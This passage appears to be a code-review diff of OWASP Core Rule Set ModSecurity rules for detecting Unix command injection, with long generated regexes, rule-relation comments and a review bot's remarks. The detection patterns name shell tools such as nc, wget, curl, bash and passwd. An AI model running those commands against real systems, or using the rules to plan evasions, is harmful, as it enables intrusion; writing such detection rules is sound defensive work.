-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:7[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[arx])?|(?:(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|x)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z|h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|[ckz][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?f|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\
x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h)|f[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[dg]|g[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:[&,<>\|]|(?:[\--\.0-9A-Z_a-z][\"'\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\*\-0-9\?-@_a-\{]*)?\x5c?)+[\s\v&,<>\|]).*|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?g)|i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b|l[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:s|z[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:4|[\s\v&\),<>\|].*))|p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|x[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?z)|r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*)?|s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|(?:e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|(?:s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\
*\-0-9\?-@_a-\{]*)?\x5c?)?h)[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?[\s\v&\),<>\|].*|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n)|u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?3[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m)\b" \ + "id:932230,\ phase:2,\ block,\ capture,\ t:none,\ - msg:'Remote Command Execution: Unix Command Injection',\ + msg:'Remote Command Execution: Unix Command Injection (2-3 chars)',\ logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',\ tag:'application-multi',\ tag:'language-shell',\ 
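Review bot: The thirty-line `Rule relations` map is repeated verbatim in this hunk for 932230 and again in the following hunk for 932235 (and presumably in front of each sibling it lists), so the copies will drift apart the first time a sibling is added or moved to another paranoia level; keeping it once at the top of the 932 rule section and pointing each rule at it with `# Rule relations: see the overview at the top of this file.` is easier to maintain. The continuation `# for prefix + two and three characters.` appended to the kept line `# This is the base Rule to prevent Unix Command Injection` reads better as `# for a command prefix followed by a two- or three-character command word.`, which also matches the `(2-3 chars)` suffix of the new msg. The expression itself is generated from `regex-assembly/932230.ra`, so the word list is out of scope for review in this file.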
@@ -115,33 +134,57 @@ SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAME tag:'OWASP_CRS',\ tag:'capec/1000/152/248/88',\ tag:'PCI/6.5.2',\ - ctl:auditLogParts=+E,\ - ver:'OWASP_CRS/3.3.0',\ + ver:'OWASP_CRS/4.0.0',\ severity:'CRITICAL',\ setvar:'tx.rce_score=+%{tx.critical_anomaly_score}',\ - setvar:'tx.anomaly_score_pl1=+%{tx.critical_anomaly_score}'" + setvar:'tx.inbound_anomaly_score_pl1=+%{tx.critical_anomaly_score}'" -# Apache 2.2 requires configuration file lines to be under 8kB. -# Therefore, some remaining commands have been split off to a separate rule. -# For explanation of this rule, see rule 932100. -# -# To rebuild the word list regexp: -# cd util/regexp-assemble -# cat regexp-932105.txt | ./regexp-cmdline.py unix | ./regexp-assemble.pl -# -# Then insert the assembled regexp into this template: -# -# SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]* -# [regexp assembled from util/regexp-assemble/regexp-932105.txt] -# \b" \ +# [ Unix command injection ] # -SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx 
(?:;|\{|\||\|\||&|&&|\n|\r|\$\(|\$\(\(|`|\${|<\(|>\(|\(\s*\))\s*(?:{|\s*\(\s*|\w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+|!\s*|\$)*\s*(?:'|\")*(?:[\?\*\[\]\(\)\-\|+\w'\"\./\\\\]+/)?[\\\\'\"]*(?:s[\\\\'\"]*(?:e[\\\\'\"]*(?:t[\\\\'\"]*(?:(?:f[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*l[\\\\'\"]*)?(?:\s|<|>).*|e[\\\\'\"]*n[\\\\'\"]*v|s[\\\\'\"]*i[\\\\'\"]*d)|n[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*a[\\\\'\"]*i[\\\\'\"]*l|d[\\\\'\"]*(?:\s|<|>).*)|h[\\\\'\"]*(?:\.[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*s[\\\\'\"]*t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*b|u[\\\\'\"]*t[\\\\'\"]*d[\\\\'\"]*o[\\\\'\"]*w[\\\\'\"]*n|(?:\s|<|>).*)|o[\\\\'\"]*(?:(?:u[\\\\'\"]*r[\\\\'\"]*c[\\\\'\"]*e|r[\\\\'\"]*t)[\\\\'\"]*(?:\s|<|>).*|c[\\\\'\"]*a[\\\\'\"]*t)|c[\\\\'\"]*(?:h[\\\\'\"]*e[\\\\'\"]*d|p[\\\\'\"]*(?:\s|<|>).*)|t[\\\\'\"]*r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g[\\\\'\"]*s|(?:l[\\\\'\"]*e[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|y[\\\\'\"]*s[\\\\'\"]*c[\\\\'\"]*t[\\\\'\"]*l|u[\\\\'\"]*(?:(?:\s|<|>).*|d[\\\\'\"]*o)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|s[\\\\'\"]*h|v[\\\\'\"]*n)|p[\\\\'\"]*(?:k[\\\\'\"]*(?:g(?:(?:[\\\\'\"]*_)?[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*f[\\\\'\"]*o)?|e[\\\\'\"]*x[\\\\'\"]*e[\\\\'\"]*c|i[\\\\'\"]*l[\\\\'\"]*l)|t[\\\\'\"]*a[\\\\'\"]*r(?:[\\\\'\"]*(?:d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p))?|a[\\\\'\"]*(?:t[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|s[\\\\'\"]*s[\\\\'\"]*w[\\\\'\"]*d)|r[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*(?:e[\\\\'\"]*n[\\\\'\"]*v|f[\\\\'\"]*(?:\s|<|>).*)|y[\\\\'\"]*t[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*n(?:[\\\\'\"]*(?:3(?:[\\\\'\"]*m)?|2))?|e[\\\\'\"]*r[\\\\'\"]*(?:l(?:[\\\\'\"]*(?:s[\\\\'\"]*h|5))?|m[\\\\'\"]*s)|(?:g[\\\\'\"]*r[\\\\'\"]*e|f[\\\\'\"]*t)[\\\\'\"]*p|(?:u[\\\\'\"]*s[\\\\'\"]*h|o[\\\\'\"]*p)[\\\\'\"]*d|h[\\\\'\"]*p(?:[\\\\'\"]*[57])?|i[\\\\'\"]*n[\\\\'\"]*g|s[\\\\'\"]*(?:\s|<|>).*)|n[\\\\'\"]*(?:c[\\\\'\"]*(?:\.[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*d[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*i[\\\\'\"]*o[\\\\'\"]*n[\\\\'\"]*a[\\\\'\"]*l|o[\\\\'\"
]*p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*b[\\\\'\"]*s[\\\\'\"]*d)|(?:\s|<|>).*|a[\\\\'\"]*t)|e[\\\\'\"]*t[\\\\'\"]*(?:k[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*-[\\\\'\"]*f[\\\\'\"]*t[\\\\'\"]*p|(?:s[\\\\'\"]*t|c)[\\\\'\"]*a[\\\\'\"]*t|(?:\s|<|>).*)|s[\\\\'\"]*(?:l[\\\\'\"]*o[\\\\'\"]*o[\\\\'\"]*k[\\\\'\"]*u[\\\\'\"]*p|t[\\\\'\"]*a[\\\\'\"]*t)|(?:a[\\\\'\"]*n[\\\\'\"]*o|i[\\\\'\"]*c[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|(?:o[\\\\'\"]*h[\\\\'\"]*u|m[\\\\'\"]*a)[\\\\'\"]*p|p[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*g)|r[\\\\'\"]*(?:e[\\\\'\"]*(?:(?:p[\\\\'\"]*(?:l[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e|e[\\\\'\"]*a[\\\\'\"]*t)|n[\\\\'\"]*a[\\\\'\"]*m[\\\\'\"]*e)[\\\\'\"]*(?:\s|<|>).*|a[\\\\'\"]*l[\\\\'\"]*p[\\\\'\"]*a[\\\\'\"]*t[\\\\'\"]*h)|m[\\\\'\"]*(?:(?:d[\\\\'\"]*i[\\\\'\"]*r[\\\\'\"]*)?(?:\s|<|>).*|u[\\\\'\"]*s[\\\\'\"]*e[\\\\'\"]*r)|u[\\\\'\"]*b[\\\\'\"]*y(?:[\\\\'\"]*(?:1(?:[\\\\'\"]*[89])?|2[\\\\'\"]*[012]))?|(?:a[\\\\'\"]*r|c[\\\\'\"]*p|p[\\\\'\"]*m)[\\\\'\"]*(?:\s|<|>).*|n[\\\\'\"]*a[\\\\'\"]*n[\\\\'\"]*o|o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|s[\\\\'\"]*y[\\\\'\"]*n[\\\\'\"]*c)|t[\\\\'\"]*(?:c[\\\\'\"]*(?:p[\\\\'\"]*(?:t[\\\\'\"]*r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e|i[\\\\'\"]*n[\\\\'\"]*g)|s[\\\\'\"]*h)|r[\\\\'\"]*a[\\\\'\"]*c[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*o[\\\\'\"]*u[\\\\'\"]*t[\\\\'\"]*e(?:[\\\\'\"]*6)?|e[\\\\'\"]*(?:l[\\\\'\"]*n[\\\\'\"]*e[\\\\'\"]*t|e[\\\\'\"]*(?:\s|<|>).*)|i[\\\\'\"]*m[\\\\'\"]*e[\\\\'\"]*(?:o[\\\\'\"]*u[\\\\'\"]*t|(?:\s|<|>).*)|a[\\\\'\"]*(?:i[\\\\'\"]*l(?:[\\\\'\"]*f)?|r[\\\\'\"]*(?:\s|<|>).*)|o[\\\\'\"]*(?:u[\\\\'\"]*c[\\\\'\"]*h[\\\\'\"]*(?:\s|<|>).*|p))|u[\\\\'\"]*(?:n[\\\\'\"]*(?:l[\\\\'\"]*(?:i[\\\\'\"]*n[\\\\'\"]*k[\\\\'\"]*(?:\s|<|>).*|z[\\\\'\"]*m[\\\\'\"]*a)|c[\\\\'\"]*o[\\\\'\"]*m[\\\\'\"]*p[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|a[\\\\'\"]*m[\\\\'\"]*e|r[\\\\'\"]*a[\\\\'\"]*r|s[\\\\'\"]*e[\\\\'\"]*t|z[\\\\'\"]*i[\\\\'\"]*p|x[\\\\'\"]*z)|s[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*(?:(?:a[\\\\'\"]*d|m[\\\\'\"]*o
)[\\\\'\"]*d|d[\\\\'\"]*e[\\\\'\"]*l)|l[\\\\'\"]*i[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*t[\\\\'\"]*(?:\s|<|>).*)|m[\\\\'\"]*(?:y[\\\\'\"]*s[\\\\'\"]*q[\\\\'\"]*l(?:[\\\\'\"]*(?:d[\\\\'\"]*u[\\\\'\"]*m[\\\\'\"]*p(?:[\\\\'\"]*s[\\\\'\"]*l[\\\\'\"]*o[\\\\'\"]*w)?|h[\\\\'\"]*o[\\\\'\"]*t[\\\\'\"]*c[\\\\'\"]*o[\\\\'\"]*p[\\\\'\"]*y|a[\\\\'\"]*d[\\\\'\"]*m[\\\\'\"]*i[\\\\'\"]*n|s[\\\\'\"]*h[\\\\'\"]*o[\\\\'\"]*w))?|(?:(?:o[\\\\'\"]*u[\\\\'\"]*n|u[\\\\'\"]*t)[\\\\'\"]*t|v)[\\\\'\"]*(?:\s|<|>).*)|x[\\\\'\"]*(?:z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|d[\\\\'\"]*(?:i[\\\\'\"]*f[\\\\'\"]*f|e[\\\\'\"]*c)|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|(?:\s|<|>).*)|a[\\\\'\"]*r[\\\\'\"]*g[\\\\'\"]*s|t[\\\\'\"]*e[\\\\'\"]*r[\\\\'\"]*m|x[\\\\'\"]*d[\\\\'\"]*(?:\s|<|>).*)|z[\\\\'\"]*(?:(?:[ef][\\\\'\"]*)?g[\\\\'\"]*r[\\\\'\"]*e[\\\\'\"]*p|c[\\\\'\"]*(?:a[\\\\'\"]*t|m[\\\\'\"]*p)|d[\\\\'\"]*i[\\\\'\"]*f[\\\\'\"]*f|i[\\\\'\"]*p[\\\\'\"]*(?:\s|<|>).*|l[\\\\'\"]*e[\\\\'\"]*s[\\\\'\"]*s|m[\\\\'\"]*o[\\\\'\"]*r[\\\\'\"]*e|r[\\\\'\"]*u[\\\\'\"]*n|s[\\\\'\"]*h)|o[\\\\'\"]*(?:p[\\\\'\"]*e[\\\\'\"]*n[\\\\'\"]*s[\\\\'\"]*s[\\\\'\"]*l|n[\\\\'\"]*i[\\\\'\"]*n[\\\\'\"]*t[\\\\'\"]*r)|w[\\\\'\"]*(?:h[\\\\'\"]*o[\\\\'\"]*(?:a[\\\\'\"]*m[\\\\'\"]*i|(?:\s|<|>).*)|g[\\\\'\"]*e[\\\\'\"]*t|3[\\\\'\"]*m)|v[\\\\'\"]*i[\\\\'\"]*(?:m[\\\\'\"]*(?:\s|<|>).*|g[\\\\'\"]*r|p[\\\\'\"]*w)|y[\\\\'\"]*u[\\\\'\"]*m)\b" \ - "id:932105,\ +# This is the base Rule to prevent Unix Command Injection +# for prefix + more than 4 characters. 
+#
+# Rule relations:
+#
+# .932230 (base rule, PL1, targets prefix + two and three character commands)
+# ..932231 (stricter sibling, PL2, targets prefix + the source shortcut command)
+# ..932232 (stricter sibling, PL3, targets prefix + additional command words)
+# .932235 (base rule, PL1, targets prefix + known command word of length > 3 without evasion)
+#
+# .932250 (base rule, PL1, targets two and three character commands)
+# .932260 (base rule, PL1, targets known command word of length > 3 without evasion)
+#
+# .932240 (generic detection, PL2, targets generic evasion attempts)
+# .932236 (stricter sibling of 932230, 932235, 932250, 932260, PL2,
+# - with and without prefix
+# - words of any length)
+# ..932239 (sibling of 932236, PL2,
+# - with and without prefix
+# - words of any length
+# - targets request headers user-agent and referer only
+# - excluded words: known user-agents)
+# ..932238 (stricter sibling of 932236, PL3,
+# - no excluded words)
+# .932237 (stricter sibling of 932230, 932235, 932250, 932260, PL3,
+# - targets request headers user-agent and referer only
+# - without prefix
+# - with word boundaries
+# - words of any length
+# - excluded words: known user-agents)
+#
+#
+# Regular expression generated from regex-assembly/932235.ra.
+# To update the regular expression run the following shell script +# (consult https://coreruleset.org/docs/development/regex_assembly/ for details): +# crs-toolchain regex update 932235 +# +SecRule REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/* "@rx (?i)(?:b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?s[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?y[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?b[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?x|c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?d|e[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?(?:n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?v|v[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?l)|[ls][\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?r[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e|n[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?
-@_a-\{]*)?\x5c?h[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?p|t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?i[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?m[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?e(?:[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?o[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?u[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t)?|w[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?a[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?t[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?c[\"'\)\[-\x5c]*(?:(?:(?:\|\||&&)[\s\v]*)?\$[!#\(\*\-0-9\?-@_a-\{]*)?\x5c?h|[\n\r;=`\{]|\|\|?|&&?|\$(?:\(\(?|\{)|<(?:\(|<<)|>\(|\([\s\v]*\))[\s\v]*(?:[\$\{]|(?:[\s\v]*\(|!)[\s\v]*|[0-9A-Z_a-z]+=(?:[^\s\v]*|\$(?:.*|.*)|[<>].*|'.*'|\".*\")[\s\v]+)*[\s\v]*[\"']*(?:[\"'-\+\--9\?A-\]_a-z\|]+/)?[\"'\x5c]*(?:(?:HEAD|POST|y(?:arn|elp))[\s\v&\)<>\|]|a(?:dd(?:group|user)|getty|(?:l(?:ias|pine)|xel)[\s\v&\)<>\|]|nsible-playbook|pt(?:-get|itude[\s\v&\)<>\|])|r(?:ch[\s\v&\)<>\|]|ia2c)|s(?:cii(?:-xfr|85)|pell)|tobm)|b(?:a(?:s(?:e(?:32|64|n(?:ame[\s\v&\)<>\|]|c))|h[\s\v&\)<>\|])|tch[\s\v&\)<>\|])|lkid|pftrace|r(?:eaksw|idge[\s\v&\)<>\|])|sd(?:cat|iff|tar)|u(?:iltin|n(?:dler[\s\v&\)<>\|]|zip2)|s(?:ctl|ybox))|y(?:ebug|obu)|z(?:c(?:at|mp)|diff|e(?:grep|xe)|f?grep|ip2(?:recover)?|less|more))|c(?:a(?:ncel|psh)[\s\v&\)<>\|]|ertbot|h(?:attr|(?:dir|root)[\s\v&\)<>\|]|eck_(?:by_ssh|cups|log|memory|raid|s(?:sl_cert|tatusfile))|(?:flag|pas)s|g(?:passwd|rp)|mod|o(?:om|wn)|sh)|lang(?:[\s\v&\)<>\|]|\+\+)|o(?:(?:b|pro)c|(?:lumn|m(?:m(?:and)?|p(?:oser|ress)))[\s\v&\)<>\|]|w(?:say|think))|p(?:an|io|ulimit)|r(?:ash[\s\v&\)<>\|]|on(?:tab)?)|s(?:plit|vtool)|u(?:psfilter|rl[\s\v
